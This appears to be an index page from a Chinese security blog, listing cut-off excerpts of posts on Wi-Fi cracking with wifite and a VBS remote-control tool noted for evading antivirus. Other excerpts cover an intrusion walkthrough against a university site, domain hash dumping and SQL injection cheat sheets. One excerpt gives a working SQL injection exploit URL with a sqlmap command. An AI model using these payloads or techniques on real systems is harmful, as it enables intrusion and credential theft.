wifite是一款自动化wep、wpa破解工具，不支持windows和osx。wifite的特点是可以同时攻击多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行，期间无需人工干预。   先复制一下说明 COMMANDS -check <file> check capfile <file> for handshakes. -cracked display previously-cracked access points GLOBAL…继续阅读 »

一款来自国外的类似远控的工具 具体地址找不到了   收发走的是http 自带启动项 （其实也可以在源码里删掉）   优点是生成的是vbs比较好免杀 也比较好写入、可以看见源码 不必担心后门。   缺点是必须调用一些组件、如果是以用户权限执行 在控制端发送dos指令会闪黑框以及不…继续阅读 »

目标：http://www.xxx.edu.cn/ 一个大学有着很庞大的数据，以及十分明细的部门分工，并且主站一般都是做的很严谨，所以可以选择直接从分站入手，由于分站数量过多，安全自然也就显得乏力了。 翻出layer子域名挖掘机 轻松翻出一大堆的子域名 Awvs果然是神器，很快便报出一个红色高危漏洞 …继续阅读 »

老漏洞 不做详细介绍   sqlmap比起网上的脱库工具更灵活 更可靠 更稳定 有效率   exp http://7kb.org/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema .tables group by x)a)%23 sqlmap 构造为 sqlmap.py -u "http://www.7kb.org/faq.php?actio…继续阅读 »

      安全评估的第一步是最大程度地收集目标系统的信息，这同样也是渗透测试的关键性步骤。信息的收集和分析伴随着渗透测试的每一个步骤。实现信息收集有很多种方法，例如：使用搜索引擎、扫描器或发送特殊构造的HTTP请求等，这些手段都可以使服务器端的应用程序返回一些错误信息或系统运…继续阅读 »

最近出了一个 Joomla的注入 影响大批网站 随后有人在sebug上给出了exp   漏洞详细说明与利用方法：https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ 存在SQL注入的地方位于：/administrator /components /com_contenthistory/ models/history.php   直接…继续阅读 »

导出当前域内所有用户hash的技术整理   0x00目标： 导出当前域内所有用户的hash 0x01测试环境： 域控：server2008 r2 杀毒软件：已安装* 域控权限：可使用net use远程登陆，不使用3389 0x02测试方法： （1）mimikatz： hash数量：只能抓取登陆过的用户hash，无法抓取所有用户 免杀：…继续阅读 »

SQL注入速查表（下）与Oracle注入速查表   一、SQL注入速查表（下） 0x00 目录 盲注 关于盲注 实战中的盲注实例 延时盲注 WAITFOR DELAY [time](S) 实例 BENCHMARK()(M) 实例 pg_sleep(seconds)(P) 掩盖痕迹 -sp_password log bypass(S) 注入测试 一些其他的MySQL笔记 MySQL中好用的…继续阅读 »

SQL注入速查表（上）   0x00 关于SQL注入速查表 现在仅支持MySQL、Microsoft SQL Server，以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个场景都适用。现实场景由于各种插入语、不同的代码环境以及各种不常见甚至奇特的SQL语句，而经常发生变化。 样例仅用于读者理解对于“可能出…继续阅读 »

看见群里有大牛发了这个东西 类似hackbar的增强版 发上来一份   下图是我用owasp最新版本的测试  一切正常   下载地址 hackbar++   找不到原帖地址。。。   7kb.org 原创,如有转载请注明出处 www.7kb.org